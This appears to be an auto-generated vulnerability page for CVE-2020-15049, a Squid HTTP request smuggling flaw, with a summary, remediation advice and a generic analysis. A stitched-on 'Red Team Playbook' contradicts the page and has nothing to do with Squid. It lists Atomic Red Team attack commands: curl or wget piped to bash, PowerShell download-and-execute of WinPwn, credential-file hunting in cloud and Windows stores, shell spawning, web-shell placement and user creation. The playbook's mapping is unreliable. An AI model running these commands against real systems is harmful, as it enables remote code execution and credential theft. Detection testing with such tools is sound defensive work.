CVE-2020-15049
Overview
This vulnerability is an HTTP request smuggling flaw caused by improper parsing of the Content-Length header in Squid's HTTP cache implementation. The root cause lies in the ContentLengthInterpreter.cc component, which incorrectly handles Content-Length values prefixed by '+' or '-' signs or uncommon shell whitespace characters. This parsing discrepancy allows the HTTP cache to misinterpret request boundaries, affecting Squid versions prior to 4.12 and 5.x before 5.0.3.
Vulnerability Description
An issue was discovered in http/ContentLengthInterpreter.cc in Squid before 4.12 and 5.x before 5.0.3. A Request Smuggling and Poisoning attack can succeed against the HTTP cache. The client sends an HTTP request with a Content-Length header containing "+\ "-" or an uncommon shell whitespace character prefix to the length field-value.
Impact
An unauthenticated remote attacker can exploit this vulnerability to perform HTTP request smuggling and cache poisoning attacks, potentially injecting malicious requests into the cache. This can lead to cache poisoning, unauthorized data manipulation, or bypassing security controls. The attack requires network access to the Squid HTTP cache and no user interaction is necessary. According to the CVSS vector, the attack has low complexity (AC:L), no user interaction (UI:N), and requires low privileges (PR:L) but can cause high confidentiality, integrity, and availability impacts (C:H/I:H/A:H).
Solution
Remediation involves upgrading Squid to version 4.12 or later, or 5.0.3 or later, as detailed in multiple vendor advisories including Fedora package announcement, Debian DSA-4732, Ubuntu USN-4551-1, and openSUSE security announcements. The patches (e.g., squid-4-ea12a34d338b962707d5078d6d1fc7c6eb119a22.patch and squid-5-485c9a7bb1bba88754e07ad0094647ea57a6eb8d.patch) fix the Content-Length header parsing logic. Administrators should consult these advisories for precise upgrade instructions and apply the updates promptly to mitigate the issue.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in question arises from a flaw in the handling of HTTP requests within the Squid caching proxy server, specifically in the ContentLengthInterpreter component. This issue allows an attacker to manipulate the Content-Length header of an HTTP request by prefixing it with unusual whitespace characters or a specific sequence of characters. Such manipulation can lead to Request Smuggling and Poisoning attacks, where the attacker can craft requests that are interpreted differently by the front-end server and the back-end server. This discrepancy can enable the attacker to bypass security controls, inject malicious content, or even gain unauthorized access to sensitive data.
Exploitation of this vulnerability can occur through various attack vectors. An attacker could send a specially crafted HTTP request to a vulnerable Squid server, which would misinterpret the Content-Length value due to the unusual formatting. This could allow the attacker to smuggle additional requests or responses, effectively controlling the flow of data between the client and the server. For instance, an attacker could exploit this flaw to send a request that appears legitimate to the front-end server while embedding malicious payloads that are executed by the back-end server. This type of attack can be particularly insidious, as it may go undetected by standard security measures, leading to severe consequences.
The real-world impact of this vulnerability can be significant, especially for organizations that rely on Squid as a caching proxy for web traffic. Successful exploitation could lead to data breaches, unauthorized access to internal systems, or the delivery of malicious content to users. The business risks associated with such incidents are multifaceted, including potential financial losses, damage to reputation, and legal repercussions stemming from compromised data. Organizations that fail to address this vulnerability may find themselves exposed to advanced persistent threats, where attackers can establish footholds within their networks and escalate privileges over time.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regularly updating and patching the Squid server to the latest versions is crucial, as newer releases contain fixes for known vulnerabilities. Additionally, employing web application firewalls (WAFs) can help filter out malicious requests and detect anomalies in HTTP traffic. Monitoring logs for unusual patterns or unexpected HTTP request formats can also aid in early detection of potential exploitation attempts. Furthermore, security awareness training for developers and system administrators can enhance the overall security posture by ensuring that those responsible for maintaining the server are aware of the risks associated with improper request handling.
In conclusion, the vulnerability within the Squid caching proxy server highlights the complexities and risks associated with HTTP request handling. Attackers can exploit this flaw to execute sophisticated attacks that may compromise the integrity and confidentiality of data. Organizations must prioritize the detection and mitigation of such vulnerabilities through proactive measures, including timely updates, robust monitoring, and comprehensive security training. By doing so, they can significantly reduce the likelihood of successful exploitation and safeguard their critical assets against evolving threats.
Affected Products (14)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Squid-Cache | Squid | All |
cpe:2.3:a:squid-cache:squid:*:*:*:*:*:*:*:*
|
|
|
Squid-Cache | Squid | All |
cpe:2.3:a:squid-cache:squid:*:*:*:*:*:*:*:*
|
|
|
Squid-Cache | Squid | All |
cpe:2.3:a:squid-cache:squid:*:*:*:*:*:*:*:*
|
|
|
Squid-Cache | Squid | All |
cpe:2.3:a:squid-cache:squid:*:*:*:*:*:*:*:*
|
|
|
Squid-Cache | Squid | 2.7 |
cpe:2.3:a:squid-cache:squid:2.7:*:*:*:*:*:*:*
|
|
|
Squid-Cache | Squid | 2.7 |
cpe:2.3:a:squid-cache:squid:2.7:stable2:*:*:*:*:*:*
|
|
|
Squid-Cache | Squid | 2.7 |
cpe:2.3:a:squid-cache:squid:2.7:stable3:*:*:*:*:*:*
|
|
|
Squid-Cache | Squid | 2.7 |
cpe:2.3:a:squid-cache:squid:2.7:stable4:*:*:*:*:*:*
|
|
|
Squid-Cache | Squid | 2.7 |
cpe:2.3:a:squid-cache:squid:2.7:stable5:*:*:*:*:*:*
|
|
|
Squid-Cache | Squid | 2.7 |
cpe:2.3:a:squid-cache:squid:2.7:stable6:*:*:*:*:*:*
|
|
|
Squid-Cache | Squid | 2.7 |
cpe:2.3:a:squid-cache:squid:2.7:stable7:*:*:*:*:*:*
|
|
|
Squid-Cache | Squid | 2.7 |
cpe:2.3:a:squid-cache:squid:2.7:stable8:*:*:*:*:*:*
|
|
|
Squid-Cache | Squid | 2.7 |
cpe:2.3:a:squid-cache:squid:2.7:stable9:*:*:*:*:*:*
|
|
|
Fedoraproject | Fedora | 31 |
cpe:2.3:o:fedoraproject:fedora:31:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-273 | HTTP Response Smuggling |
32%
|
Medium | High | |
| CAPEC-33 | HTTP Request Smuggling |
32%
|
Medium | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.